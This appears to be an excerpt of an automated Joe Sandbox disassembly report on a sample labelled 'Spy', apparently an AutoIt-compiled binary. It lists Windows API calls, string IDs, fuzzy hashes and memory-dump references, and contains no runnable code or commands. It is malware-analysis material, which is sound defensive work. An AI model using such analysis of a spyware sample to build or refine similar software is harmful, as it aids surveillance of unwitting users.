                                                      • Instruction ID: fdd1e391a4f6b10a60c178d9c5c99031897ad6ae9fa2e8d1f1b2104fdd4a8397
                                                      • Opcode Fuzzy Hash: eb6a8e3768c31641c30ea7ce571ab78f4894104cbd1b53caf71c58b0a5dadb9f
                                                      • Instruction Fuzzy Hash: 7A515A71408B459BE320AF50E885BAFBBF8FF88714F41884DF1D8411A1EF709529CB16
                                                      APIs
                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B08186
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B0819B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
                                                      • Instruction ID: a5b1612225847bed2b918ac5dda5effb4e03020bd6119669b457f44a7f717b6f
                                                      • Opcode Fuzzy Hash: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
                                                      • Instruction Fuzzy Hash: 35412874A002099FDB10CF64D881BEA7BF5FF09300F1045AAE944EB391DB70AA56CF90
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AF2C6A
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AF2CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
                                                      • Instruction ID: 71c5a006529fe08077895a8cd198b06aaad33e389d4a25f87c804cdc5aa28bad
                                                      • Opcode Fuzzy Hash: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
                                                      • Instruction Fuzzy Hash: E8314D71D00119ABCF11EFA1CD85AEFBFB9FF04340F100019F915AA262EB315956DBA0
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00B0713C
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B07178
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 8ea87dfc2a1a9f4b58bbccde2aca5834844f2a1a75430dd60250676f5342fa8b
                                                      • Instruction ID: 17558bb82213bda5a51513f6a370020727ada08b977d0606b3c872b85fdcc7d8
                                                      • Opcode Fuzzy Hash: 8ea87dfc2a1a9f4b58bbccde2aca5834844f2a1a75430dd60250676f5342fa8b
                                                      • Instruction Fuzzy Hash: 52319C71540604AEEB109F78CC80BFBBBE9FF48720F109659F9A5971D0DA30AC81CB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE30B8
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE30F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 414c333b0b9e7624693c8235511dc310ee9fa5588e9daba33863758e9d4289ed
                                                      • Instruction ID: 11bb23001ed80b3f4938ed5c33f23e2d5d5af553de19b4b34d75720902ae3903
                                                      • Opcode Fuzzy Hash: 414c333b0b9e7624693c8235511dc310ee9fa5588e9daba33863758e9d4289ed
                                                      • Instruction Fuzzy Hash: D831F533600285ABEF248F5AC989BAEBBB8EF05350F14411DE981E71A0EB709B40CB50
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00AF4132
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: 06395b6453ae8a7ab9ecad5f02de3f9374bf8bb02e3fe5c358302de0d1a978d5
                                                      • Instruction ID: 860326478b90fd616a50dac9f4cc3cfb6b7966b03e2f2af4f1ef25b8e798a5ff
                                                      • Opcode Fuzzy Hash: 06395b6453ae8a7ab9ecad5f02de3f9374bf8bb02e3fe5c358302de0d1a978d5
                                                      • Instruction Fuzzy Hash: C0219131A0021DABCF10EFA4C991EAE77F5EF58740F5004A5FA05A7281DB30EA85CBA5
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B06D86
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B06D91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
                                                      • Instruction ID: 031254e0bd8459e180e26e7547403650a999ff087cd3412b53b1b00583860c48
                                                      • Opcode Fuzzy Hash: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
                                                      • Instruction Fuzzy Hash: 68116071710209AFEF259E54DC81FBB3FAAEB84364F214279F9149B2E0DA719C618760
                                                      APIs
                                                        • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                        • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                        • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                      • GetWindowRect.USER32(00000000,?), ref: 00B07296
                                                      • GetSysColor.USER32(00000012), ref: 00B072B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
                                                      • Instruction ID: 4b3e8227cbbabb04b57c66fe2805ddfcc0165aa3126ee9a602b3103b3e6526c3
                                                      • Opcode Fuzzy Hash: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
                                                      • Instruction Fuzzy Hash: BA211772A5420AAFDB04DFA8CC45EFABBE8EB09314F004658FD55D3290DB75E891DB60
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00B06FC7
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B06FD6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
                                                      • Instruction ID: cca151b847fa1fee0fd3307721446fb471f01ae0af75667728e1f8fc280ad259
                                                      • Opcode Fuzzy Hash: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
                                                      • Instruction Fuzzy Hash: 55116D7111020AAFEB105E64AC84EEB3FAAEF15368F504754F965931E0CB75DCA09B60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE31C9
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AE31E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
                                                      • Instruction ID: 351bc5df960e386c7efd7c74128a4578d377b29290f82ac029c923c367218bd0
                                                      • Opcode Fuzzy Hash: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
                                                      • Instruction Fuzzy Hash: 2E110837900254ABDF20DB9ADC4DB9D77B8AF06310F184269E945A7290DB70EF05CB91
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AF28F8
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AF2921
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
                                                      • Instruction ID: e297c43b75c85325e3e71647c8032584767c8086675ce17464f766b4538d8828
                                                      • Opcode Fuzzy Hash: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
                                                      • Instruction Fuzzy Hash: 5711A370501229BAEB258F918C89FF7FBACFF05791F10812AF64557140E7B05894D7E0
                                                      APIs
                                                        • Part of subcall function 00AF86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AF849D,?,00000000,?,?), ref: 00AF86F7
                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00AF84DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 2496851823-2422070025
                                                      • Opcode ID: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
                                                      • Instruction ID: 1d2006e2b28ff8a5f48d0841462359f07532efac5c45fba6559b15d7e0a5324d
                                                      • Opcode Fuzzy Hash: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
                                                      • Instruction Fuzzy Hash: ED11A13520020AABDB10EFA4CD46FFEB364FF14321F10862AFA15972D1DF75A810C695
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AD9A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
                                                      • Instruction ID: 4957d3fea0f4f3aa5b275365b9c7a07c560ea4b61a783f488110b58db88c5a54
                                                      • Opcode Fuzzy Hash: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
                                                      • Instruction Fuzzy Hash: 8001B572A52225AF8F14EBA4CD51CFE73B9AF56360B50061AF862573D1DE319C08D660
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
                                                      • Instruction ID: 4169272f251dffef175ea2f88b0f66b227a55df957a7aecd364ab66f30bb8695
                                                      • Opcode Fuzzy Hash: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
                                                      • Instruction Fuzzy Hash: 7C01B972D042587EDB28C7A9C856EBE7BF89B16301F00419EF552D62C1E579A6049760
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AD9923
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
                                                      • Instruction ID: 6b19ad6b59de16fc9ed0c7237b01c8095f2a42fda2700a75326c73f23aa4705c
                                                      • Opcode Fuzzy Hash: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
                                                      • Instruction Fuzzy Hash: 33018476A92105ABCF14EBA0CA62EFF73EC9F15340F60011AB84263391DE119E0896B1
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AD99A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
                                                      • Instruction ID: 8a419a67a53a5c0189c1ca10eb092c0187819c34a5918370e45419dd430f2e78
                                                      • Opcode Fuzzy Hash: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
                                                      • Instruction Fuzzy Hash: A601A772A42105ABCF14EBA4CA56EFF73FC9F11340F60001AB84663391DE159E089671
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
                                                      • Instruction ID: 00579647d145e96a8c657f7c5f85c44bbbc131ed900762ecfa13e6b01f2cff01
                                                      • Opcode Fuzzy Hash: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
                                                      • Instruction Fuzzy Hash: 79E0D17790022917D710EB59AC45FABFBECEB55771F000157FD04D7051DA609A4587E0
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AD88A0
                                                        • Part of subcall function 00AA3588: _doexit.LIBCMT ref: 00AA3592
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: 4a75cd0bef98e38f2ce77f0406156d0a84719cd67db780771911420e4628ee7f
                                                      • Instruction ID: e11f1722949363fbdb474024671718a57092891df59959c498d97e674a0a7ff4
                                                      • Opcode Fuzzy Hash: 4a75cd0bef98e38f2ce77f0406156d0a84719cd67db780771911420e4628ee7f
                                                      • Instruction Fuzzy Hash: F7D02B3238031836C22433E86D0BFCA3A888B06B90F10802AFB08661D38ED685D042D5
                                                      APIs
                                                        • Part of subcall function 00ABB544: _memset.LIBCMT ref: 00ABB551
                                                        • Part of subcall function 00AA0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ABB520,?,?,?,00A8100A), ref: 00AA0B79
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00A8100A), ref: 00ABB524
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A8100A), ref: 00ABB533
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ABB52E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
